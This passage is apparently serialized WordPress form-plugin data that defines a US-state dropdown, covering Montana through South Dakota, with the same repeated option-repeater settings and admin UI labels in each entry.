Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 